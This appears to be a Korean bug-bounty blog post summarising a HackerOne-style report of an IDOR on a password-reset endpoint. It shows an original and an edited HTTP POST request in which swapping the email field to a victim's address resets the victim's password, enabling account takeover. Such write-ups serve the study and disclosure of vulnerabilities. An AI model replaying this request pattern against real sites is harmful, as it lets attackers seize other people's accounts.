| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | |||
| 5 | 6 | 7 | 8 | 9 | 10 | 11 |
| 12 | 13 | 14 | 15 | 16 | 17 | 18 |
| 19 | 20 | 21 | 22 | 23 | 24 | 25 |
| 26 | 27 | 28 | 29 | 30 | 31 |
- 취약점
- wargame
- hackerone
- XSS
- 면접후기
- 케이쉴드주니어4기
- bugbounty
- 구글해킹
- wargmae
- 컨설팅
- writeup
- 케쉴주4기
- IDOR
- 케이쉴드주니어
- Googledorks
- 우버
- report
- hacker101
- game
- 웹해킹
- 호스트헤더
- 인젝션
- 케쉴주
- CTF
- 정보보호관리진단
- 버그바운티
- Today
- Total
Hack The World
A Simple IDOR to Account Takeover 본문
비밀번호reset 페이지에서 간단한 IDOR 로 $4500 을 받은 리포트
원본:https://medium.com/@swapmaurya20/a-simple-idor-to-account-takeover-88b8a1d2ec24
Original Request:-
POST /login/internalResetPasswordSubmit?Toketoken=random_char&m=1234&nid=random_char HTTP/1.1
Host: subdomain.example.com
Headers: Etc
Cookie: all_required_cookies
{“email”:”attacker_account@test.com”,”password”:”new_passwd”,”confirmPassword”:”new_passwd”}
Edited Request:-
POST /login/internalResetPasswordSubmit?Toketoken=random_char&m=1234&nid=random_char HTTP/1.1
Host: subdomain.example.com
Headers: Etc
Cookie: all_required_cookies
{“email”:”victim_account@test.com”,”password”:”new_passwd”,”confirmPassword”:”new_passwd”}
공격자의 패스워드를 변경하는 요청에서 email 을 희생자의 이메일로 변경하고 요청했더니
희생자의 비밀번호가 변경.
내가 하는 사이트에서는 이런 간단한 취약점은 절때 안나오던데...휴...
이 취약점으로 헌터는 $4500 포상금 받은 개꿀 취약점
'BugBounty > Write up' 카테고리의 다른 글
| Host header injection 취약점 $800 (0) | 2020.04.08 |
|---|---|
| IDOR + PATCH 메소드 사용 계정우회 (0) | 2020.03.10 |
| Hyperlink Injection - Easy Money (sometimes) (0) | 2020.02.28 |
| hacked Uber Account (0) | 2020.02.14 |
| Host header poisoning 비밀번호 탈취 (0) | 2020.02.13 |
